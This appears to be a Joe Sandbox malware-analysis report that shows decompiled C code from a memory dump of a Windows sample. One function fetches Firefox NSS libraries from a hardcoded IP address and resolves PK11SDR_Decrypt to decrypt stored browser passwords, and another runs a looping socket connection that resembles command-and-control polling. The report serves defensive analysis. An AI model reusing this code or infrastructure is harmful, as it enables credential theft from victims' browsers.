Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$ComputerNamelstrcpy
String ID:
API String ID: 461527575-0
Opcode ID: dbdeb2ad42beadd3c8bd2260592bb393b6893c01dd556616a1bf03803acfcebc
Instruction ID: bdf8a31a04c2b106fc7329d36d5f9aeef1b2fed5eef025c8d1edc5b18d29901e
Opcode Fuzzy Hash: dbdeb2ad42beadd3c8bd2260592bb393b6893c01dd556616a1bf03803acfcebc
Instruction Fuzzy Hash: 79E01A72A0411CA7CF14DAAAD9499CFBBFCEB88754F100466E901F7180DAB5AF4987A4

Uniqueness

Uniqueness Score: -1.00%

Function 004030FB Relevance: 1.5, APIs: 1, Instructions: 25
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FB(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E00403027(_t14);
				_t6 = E0040589C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403027(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}

0x00403101
0x00403104
0x00403108
0x00403121
0x00403126
0x00403135

APIs

Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E

lstrcatW.KERNEL32 ref: 0040312B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: e5442f1307ba62136afd97d8fff82842ab528cde5e7ad936f2e4bc3c50cf249e
Instruction ID: 0635443dc7dac3c59bdfe9f658cb2a12e24310b35697f9e589b7930ca1a94137
Opcode Fuzzy Hash: e5442f1307ba62136afd97d8fff82842ab528cde5e7ad936f2e4bc3c50cf249e
Instruction Fuzzy Hash: 36E026323002106BCB01AF66EC84CAEBB9EEF85365704003BFA05D7251EE365C10CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040536C Relevance: 1.5, APIs: 1, Instructions: 23
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040536C(void* __ecx, void* __eflags) {

				E00402F89(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E0040DDC0(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}

0x00405370
0x00405377
0x0040537a
0x00405384
0x00405387
0x0040538a
0x00405395
0x0040539b
0x004053a1
0x004053a4
0x004053a9

APIs

Part of subcall function 0040DDC0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040DA06,?,?,0040DF81,?,?,00000000,004054B9,?,?,00000000), ref: 0040DDC8

WSAStartup.WS2_32(00000002,?), ref: 00405395

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateMutexStartup
String ID:
API String ID: 3730780901-0
Opcode ID: baa3fc17b0248c4283b4fca553cb06536fe40c7224b5286a556a19cd5e85852e
Instruction ID: f5eca36c68788924e911baf6f0b04bd194a72abfb5e86dc23186084cc7b6b86c
Opcode Fuzzy Hash: baa3fc17b0248c4283b4fca553cb06536fe40c7224b5286a556a19cd5e85852e
Instruction Fuzzy Hash: 37E0C971911B118BC274AF2B9A45897FBF8FF907207005A1FA5A682AA0C7B4A509CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401E8E Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E8E(void** __ecx, _Unknown_base(*)()* _a4, void* _a8) {
				void* _t8;
				void** _t13;

				_t13 = __ecx;
				_t8 = CreateThread(0, 0, _a4, _a8, 0, __ecx + 4); // executed
				 *_t13 = _t8;
				return 0 | _t8 != 0x00000000;
			}

0x00401e92
0x00401ea3
0x00401eab
0x00401eb6

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401EA3

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9833c7ac8ab7887e89c0ffe9bc6b052ab53fcfd75cea5b242e43b8bba9ce0e22
Instruction ID: a31c05f95a2705ac5e77bcdc3af03b55ed3d173fdf1d051a2f1c7b1ecc077b7e
Opcode Fuzzy Hash: 9833c7ac8ab7887e89c0ffe9bc6b052ab53fcfd75cea5b242e43b8bba9ce0e22
Instruction Fuzzy Hash: 28D05EB71042097FAB059FA8AC00CE77BDCEF18210301843ABA89CA100E671DC209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8CD Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8CD(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00402EEB(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}

0x0040d8d5
0x0040d8da
0x0040d8ee
0x0040d8f6

APIs

Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17

CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0040D8E8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateEventlstrcat
String ID:
API String ID: 2275612694-0
Opcode ID: c9bb438ae92a46f0909a3f03c93044d82bdca417565dbc956c3fa41333a619d0
Instruction ID: 07b0d8bca42cfc98e21ea6038bc4c00e6f6be2aca032b59bbda8e163674538c9
Opcode Fuzzy Hash: c9bb438ae92a46f0909a3f03c93044d82bdca417565dbc956c3fa41333a619d0
Instruction Fuzzy Hash: 4ED017722442057BE710EAA1DD06F96BB29EB51760F008026F65996590DBB1A020C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDC0 Relevance: 1.5, APIs: 1, Instructions: 15
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDC0(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}

0x0040ddc3
0x0040ddc8
0x0040ddd0
0x0040ddda
0x0040ddde

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040DA06,?,?,0040DF81,?,?,00000000,004054B9,?,?,00000000), ref: 0040DDC8

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1c00198725ec014aba790d42660317b372c74746e568cf1a60557972ffb63291
Instruction ID: 07bd7781ce9137685e67f9b4f686359db9f387ea5e92b63b7d165c76255a07c3
Opcode Fuzzy Hash: 1c00198725ec014aba790d42660317b372c74746e568cf1a60557972ffb63291
Instruction Fuzzy Hash: 90D012B15005215FE324DF395C088A7B6DDDF99720315CF39B4A5C72D4E5708C518760

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA99 Relevance: 1.5, APIs: 1, Instructions: 9
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EA99(void** __ecx) {
				long _t1;
				signed int* _t3;

				_t3 = __ecx;
				if( *__ecx != 0) {
					_t1 = RegCloseKey( *__ecx); // executed
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t1;
			}

0x0040ea9a
0x0040ea9f
0x0040eaa3
0x0040eaa3
0x0040eaa9
0x0040eaad

APIs

RegCloseKey.KERNEL32(?), ref: 0040EAA3

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: dae7f6f74e01043dfa329407c6c134171b71ec0e02b544983ae185f9a983359b
Instruction ID: 8c4ac19d1c85d71738d46c5a306d752660919070035a20ed957b2889832e0c3c
Opcode Fuzzy Hash: dae7f6f74e01043dfa329407c6c134171b71ec0e02b544983ae185f9a983359b
Instruction Fuzzy Hash: 93C04C35110221CFE7351F14F40479177E4AB45312F25096E94C0551A4E7B908E1DA88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4D0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040D4D6

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 671add6af4e9af37d0c901fd18cea1371dbf89a0f092b1388cd69bf32bf3acda
Instruction ID: 4756d4c00611f9a9e908fe26c5d178335cfb5634c53c8157359128b798ed8997
Opcode Fuzzy Hash: 671add6af4e9af37d0c901fd18cea1371dbf89a0f092b1388cd69bf32bf3acda
Instruction Fuzzy Hash: 44B012303E520057DA011BB0DC06F143610974AB07F2045B0F113C90E0C6A200105604

Uniqueness

Uniqueness Score: -1.00%

Function 0040496D Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040496D(void* __ecx, void* __edx, void* __eflags) {
				signed int _v12;
				signed int _v20;
				void* _t18;
				short** _t20;
				void* _t22;
				void* _t24;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;

				_t38 = __eflags;
				_t33 = __edx;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x234)) = 1;
				_t35 = __ecx + 0x1e4;
				do {
					_t26 = _t35;
					_t18 = E004056C3(_t35,  &_v20); // executed
					_t20 = E004056C3(_t35,  &_v12); // executed
					E0040331A(_t20, _t37); // executed
					_t22 = E00405294(_t34 + 4, _t38, _t26,  *((intOrPtr*)(_t18 + 4))); // executed
					E004058FB(_v12);
					_v12 = _v12 & 0x00000000;
					_t24 = E004058FB(_v20);
					_v20 = _v20 & 0x00000000;
					_t39 = _t22;
					if(_t22 != 0) {
						_t24 = E004050CC(_t34 + 4, _t33, _t39, _t34); // executed
					}
					Sleep( *(_t34 + 0x210));
					_t35 = _t34 + 0x1e4;
				} while ( *((intOrPtr*)(_t34 + 0x234)) != 0);
				return _t24;
			}

0x0040496d
0x0040496d
0x00404976
0x00404978
0x00404982
0x00404988
0x0040498b
0x0040498e
0x0040499e
0x004049a5
0x004049ad
0x004049b7
0x004049bf
0x004049c3
0x004049c8
0x004049cc
0x004049ce
0x004049d4
0x004049d4
0x004049df
0x004049ec
0x004049ec
0x004049f8

APIs

Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,004049AA,?), ref: 00403347
Part of subcall function 0040331A: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00403372

Part of subcall function 00405294: getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
Part of subcall function 00405294: socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
Part of subcall function 00405294: htons.WS2_32(?), ref: 0040531E
Part of subcall function 00405294: freeaddrinfo.WS2_32(00000000), ref: 0040532E
Part of subcall function 00405294: connect.WS2_32(?,?,00000010), ref: 0040533A

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004049DF

Part of subcall function 004050CC: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405105
Part of subcall function 004050CC: recv.WS2_32(000000FF,?,00001000,00000000), ref: 00405172

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonsrecvsetsockoptsocket
String ID:
API String ID: 2051680647-0
Opcode ID: 07fe15add3e9289279a36786145b98f72fe12ffa8fb347736b30218adec9588f
Instruction ID: 8e6a949757141c599bff318137c809bcce5097105131befab5fba3a685319e32
Opcode Fuzzy Hash: 07fe15add3e9289279a36786145b98f72fe12ffa8fb347736b30218adec9588f
Instruction Fuzzy Hash: 5D016171A00615ABCB04BB65C845AEFFB78FB40319F00052AE919B3181DB786915CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00405878 Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405878(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00405966(_t8, _t7);
				return _t8;
			}

0x00405881
0x00405886
0x0040588c
0x00405891
0x0040589b

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004031A8,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 00405886

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d9073416d2fd1faa03023874fc1c04eaca6bdd6f5e64a0b109cfe0ff19367257
Instruction ID: 3f63ec1a31b3eed456ebf4a88602ebc8d5af4db36e99ec9e2590f72e1b0f915e
Opcode Fuzzy Hash: d9073416d2fd1faa03023874fc1c04eaca6bdd6f5e64a0b109cfe0ff19367257
Instruction Fuzzy Hash: 26C0122234412026F528112A7C1AF5B8D9CCBC1F75F05002FF705DA2D0D8D00D0181A8

Uniqueness

Uniqueness Score: -1.00%

Function 00408AEF Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408AEF(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}

0x00408aef
0x00408af4
0x00405903
0x00405909
0x00408afa
0x00408afa
0x00408afa

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5c9aa9d59f1d4c3f266fbc9e9648e11d5578a295b7e23ed19a2eb357d29fe5e6
Instruction ID: 328df8694baeebfeb964f5338988204f6ac9fa0d8813412dd49217591bdbfe0d
Opcode Fuzzy Hash: 5c9aa9d59f1d4c3f266fbc9e9648e11d5578a295b7e23ed19a2eb357d29fe5e6
Instruction Fuzzy Hash: 13B0923434070057EE2CDB308D15B6A3611BB84B06FB489ACA68AAA1C08AA9E412DA08

Uniqueness

Uniqueness Score: -1.00%

Function 0040590A Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040590A(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}

0x00405914
0x0040591a

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c9658c9e35204f7daf98a3c8dcc1fa9d63f230a411ac8ad79246ea50e1fd0ab6
Instruction ID: 21e989bf3f32e87747f18243fda0ae1a5c898331392b5dd0f7176367646e8b49
Opcode Fuzzy Hash: c9658c9e35204f7daf98a3c8dcc1fa9d63f230a411ac8ad79246ea50e1fd0ab6
Instruction Fuzzy Hash: D4A002F07D53107AFD6D57619F1FF552D18D744F16F114254B30EAC0D095E02510C52D

Uniqueness

Uniqueness Score: -1.00%

Function 004058FB Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058FB(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}

0x00405903
0x00405909

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0571392a5480f836c776670bcb193f8be09ddc7ebf2dc31b310d72f8261e3615
Instruction ID: a8a616b64f15f17b29024dd0f08c15f87f013e3e27281ba4811748fd1aaa41c6
Opcode Fuzzy Hash: 0571392a5480f836c776670bcb193f8be09ddc7ebf2dc31b310d72f8261e3615
Instruction Fuzzy Hash: D3A0027069071066ED7497305E0AF4539157744B01F308654734EA90D089E5A014CA1C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A50C Relevance: 98.5, APIs: 29, Strings: 27, Instructions: 506
librarystringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040A50C(WCHAR* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				void* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				short _v564;
				short _v1076;
				short _v1588;
				short _v2100;
				short _v2612;
				short _v3124;
				short _v3644;
				WCHAR* _t223;
				int _t228;
				int _t236;
				void* _t279;
				WCHAR* _t315;
				struct HINSTANCE__* _t317;
				void* _t328;
				char* _t329;
				char* _t330;
				char* _t331;
				WCHAR* _t338;
				WCHAR* _t375;
				short _t376;
				intOrPtr _t400;
				char* _t401;
				void* _t414;
				WCHAR* _t430;
				WCHAR* _t437;
				WCHAR* _t439;
				intOrPtr _t441;
				WCHAR* _t445;

				_t338 = 0;
				_t437 = __ecx;
				_v8 = __ecx;
				E00401052( &_v3644, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v3644);
				if(_a8 != 1 || _t437[0x58] != 0 && _t437[0x52] != 0 && _t437[0x54] != 0 && _t437[0x5a] != 0 && _t437[0x4e] != 0 && _t437[0x56] != 0) {
					SetCurrentDirectoryW(_a4);
					E00403230( &_a4, _t414, __eflags, "\\");
					E004033F3( &_v36,  &_a4);
					E00403230( &_v36, _t414, __eflags, L"nss3.dll");
					E004033F3( &_v16,  &_a4);
					E00403230( &_v16, _t414, __eflags, L"msvcr120.dll");
					E004033F3( &_v20,  &_a4);
					E00403230( &_v20, _t414, __eflags, L"msvcp120.dll");
					E004033F3( &_v32,  &_a4);
					E00403230( &_v32, _t414, __eflags, L"mozglue.dll");
					E004033F3( &_v40,  &_a4);
					E00403230( &_v40, _t414, __eflags, L"softokn3.dll");
					E004033F3( &_v8,  &_a4);
					E00403230( &_v8, _t414, __eflags, L"vcruntime140.dll");
					E004033F3( &_v12,  &_a4);
					E00403230( &_v12, _t414, __eflags, L"msvcp");
					E004033F3( &_v28,  &_a4);
					E00403230( &_v28, _t414, __eflags, L"msvcr");
					_t223 = 0x5a;
					_v24 = _t223;
					_t441 = _t223;
					while(1) {
						E004033F3( &_a8,  &_v12);
						E00403230(E00403038( &_a8, _t414, __eflags, _t441), _t414, __eflags, L".dll");
						_t228 = PathFileExistsW(_a8);
						__eflags = _t228;
						if(_t228 != 0) {
							break;
						}
						_t441 = _t441 + 0xa;
						E004058FB(_a8);
						_a8 = _t338;
						__eflags = _t441 - 0x96;
						if(_t441 != 0x96) {
							continue;
						} else {
							while(1) {
								L53:
								E004033F3( &_a8,  &_v28);
								E00403230(E00403038( &_a8, _t414, __eflags, _v24), _t414, __eflags, L".dll");
								_t236 = PathFileExistsW(_a8);
								__eflags = _t236;
								if(_t236 != 0) {
									break;
								}
								_v24 = _v24 + 0xa;
								E004058FB(_a8);
								__eflags = _v24 - 0x96;
								_a8 = _t338;
								if(__eflags != 0) {
									continue;
								} else {
								}
								L57:
								_t437[0x5a] = LoadLibraryW(_v8);
								_t437[0x50] = LoadLibraryW(_v16);
								_t437[0x52] = LoadLibraryW(_v20);
								_t437[0x54] = LoadLibraryW(_v32);
								_t437[0x56] = LoadLibraryW(_v36);
								E004058FB(_v28);
								E004058FB(_v12);
								E004058FB(_v8);
								E004058FB(_v40);
								E004058FB(_v32);
								E004058FB(_v20);
								E004058FB(_v16);
								_t375 = _v36;
								goto L58;
							}
							E004031FD( &_v16,  &_a8);
							E004058FB(_a8);
							goto L57;
						}
						goto L53;
					}
					E004031FD( &_v20,  &_a8);
					E004058FB(_a8);
					goto L53;
				} else {
					E00401052( &_v2100, _t338, 0x100);
					E00401052( &_v564, _t338, 0x100);
					E00401052( &_v1588, _t338, 0x100);
					E00401052( &_v1076, _t338, 0x100);
					E00401052( &_v3124, _t338, 0x100);
					_t279 = E00401052( &_v2612, _t338, 0x100);
					_v36 = _t338;
					_v32 = _t338;
					_v44 = _t338;
					_v48 = _t338;
					_v52 = _t338;
					_v40 = _t338;
					__imp__InternetCheckConnectionW(L"http://www.google.com", 1, _t338);
					if(_t279 != 0) {
						_v24 = E0040F445(L"http://5.206.225.104/dll/softokn3.dll",  &_v36);
						_v28 = E0040F445(L"http://5.206.225.104/dll/msvcp140.dll",  &_v32);
						_v16 = E0040F445(L"http://5.206.225.104/dll/mozglue.dll",  &_v44);
						_v12 = E0040F445(L"http://5.206.225.104/dll/vcruntime140.dll",  &_v48);
						_a8 = E0040F445(L"http://5.206.225.104/dll/freebl3.dll",  &_v52);
						_v20 = E0040F445(L"http://5.206.225.104/dll/nss3.dll",  &_v40);
						GetTempPathW(0x100,  &_v2612);
						lstrcatW( &_v2612, L"softokn3.dll");
						GetTempPathW(0x100,  &_v564);
						lstrcatW( &_v564, L"msvcp140.dll");
						GetTempPathW(0x100,  &_v1588);
						lstrcatW( &_v1588, L"mozglue.dll");
						GetTempPathW(0x100,  &_v1076);
						lstrcatW( &_v1076, L"vcruntime140.dll");
						GetTempPathW(0x100,  &_v3124);
						lstrcatW( &_v3124, L"freebl3.dll");
						GetTempPathW(0x100,  &_v2100);
						lstrcatW( &_v2100, L"nss3.dll");
						if(_v24 == _t338) {
							L46:
							_t437 = _v8;
						} else {
							_t439 = _v28;
							_t315 = _v16;
							_t400 = _v12;
							_t430 = _a8;
							_t445 = _v20;
							if(_t439 != 0 && _t315 != 0 && _t400 != 0 && _t430 != 0 && _t445 != 0) {
								_t401 = _v24;
								_t328 = 0x5a;
								if( *_t401 != 0x4d ||  *((intOrPtr*)(_t401 + 1)) != _t328) {
									_v24 = _t338;
								} else {
									E0040F52A( &_v2612, _t401, _v36);
									_t328 = 0x5a;
								}
								if( *_t439 != 0x4d ||  *((intOrPtr*)(_t439 + 1)) != _t328) {
									_t439 = _t338;
									_v28 = _t439;
								} else {
									E0040F52A( &_v564, _t439, _v32);
								}
								_t329 = _v16;
								if( *_t329 != 0x4d ||  *((char*)(_t329 + 1)) != 0x5a) {
									_v16 = _t338;
								} else {
									E0040F52A( &_v1588, _t329, _v44);
								}
								_t330 = _v12;
								if( *_t330 != 0x4d ||  *((char*)(_t330 + 1)) != 0x5a) {
									_v12 = _t338;
								} else {
									E0040F52A( &_v1076, _t330, _v48);
								}
								_t331 = _a8;
								if( *_t331 != 0x4d ||  *((char*)(_t331 + 1)) != 0x5a) {
									_t430 = _t338;
									_a8 = _t430;
								} else {
									E0040F52A( &_v3124, _t331, _v52);
									_t430 = _a8;
								}
								if( *_t445 != 0x4d ||  *((char*)(_t445 + 1)) != 0x5a) {
									_t445 = _t338;
									_v20 = _t445;
								} else {
									E0040F52A( &_v2100, _t445, _v40);
									_t430 = _a8;
								}
								_t400 = _v12;
								_t315 = _v16;
							}
							if(_v24 == _t338 || _t439 == 0 || _t315 == 0 || _t400 == 0 || _t430 == 0 || _t445 == 0) {
								goto L46;
							} else {
								_t317 = LoadLibraryW( &_v564);
								_t437 = _v8;
								_t437[0x52] = _t317;
								_t437[0x5a] = LoadLibraryW( &_v1076);
								_t437[0x54] = LoadLibraryW( &_v1588);
								_t437[0x56] = LoadLibraryW( &_v2100);
								_t437[0x58] = LoadLibraryW( &_v2612);
								_t437[0x4e] = LoadLibraryW( &_v3124);
							}
						}
						E004058FB(_v24);
						E004058FB(_v28);
						E004058FB(_v16);
						E004058FB(_v12);
						E004058FB(_a8);
						_t375 = _v20;
						L58:
						E004058FB(_t375);
					}
				}
				_t376 = _t437[0x56];
				_t483 = _t376;
				if(_t376 != 0) {
					_push(_t376);
					_t437[0x30] = E0040E579(_t376, "NSS_Init", _t483);
					_t437[0x3c] = E0040E579(_t437[0x56], "PK11_GetInternalKeySlot", _t483);
					_t437[0x3a] = E0040E579(_t437[0x56], "PK11_Authenticate", _t483);
					_t437[0x34] = E0040E579(_t437[0x56], "PK11SDR_Decrypt", _t483);
					_t437[0x36] = E0040E579(_t437[0x56], "NSSBase64_DecodeBuffer", _t483);
					_t437[0x38] = E0040E579(_t437[0x56], "PK11_CheckUserPassword", _t483);
					_t437[0x32] = E0040E579(_t437[0x56], "NSS_Shutdown", _t483);
					_t437[0x3e] = E0040E579(_t437[0x56], "PK11_FreeSlot", _t483);
					_t437[0x40] = E0040E579(_t437[0x56], "PR_GetError", _t483);
					SetCurrentDirectoryW( &_v3644);
					_t338 = 1;
				}
				E004058FB(_a4);
				return _t338;
			}

0x0040a524
0x0040a526
0x0040a52a
0x0040a52d
0x0040a53d
0x0040a547
0x0040a8f1
0x0040a8ff
0x0040a90b
0x0040a918
0x0040a924
0x0040a931
0x0040a93d
0x0040a94a
0x0040a956
0x0040a963
0x0040a96f
0x0040a97c
0x0040a988
0x0040a995
0x0040a9a1
0x0040a9ae
0x0040a9ba
0x0040a9c7
0x0040a9ce
0x0040a9cf
0x0040a9d2
0x0040a9d4
0x0040a9db
0x0040a9f0
0x0040a9f8
0x0040a9fe
0x0040aa00
0x00000000
0x00000000
0x0040aa05
0x0040aa08
0x0040aa0d
0x0040aa10
0x0040aa16
0x00000000
0x0040aa18
0x0040aa2e
0x0040aa2e
0x0040aa35
0x0040aa4c
0x0040aa54
0x0040aa5a
0x0040aa5c
0x00000000
0x00000000
0x0040aa61
0x0040aa65
0x0040aa6a
0x0040aa71
0x0040aa74
0x00000000
0x00000000
0x0040aa76
0x0040aa8c
0x0040aa9a
0x0040aaa5
0x0040aab0
0x0040aabb
0x0040aac6
0x0040aacc
0x0040aad4
0x0040aadc
0x0040aae4
0x0040aaec
0x0040aaf4
0x0040aafc
0x0040ab01
0x00000000
0x0040ab01
0x0040aa7f
0x0040aa87
0x00000000
0x0040aa87
0x00000000
0x0040aa16
0x0040aa21
0x0040aa29
0x00000000
0x0040a581
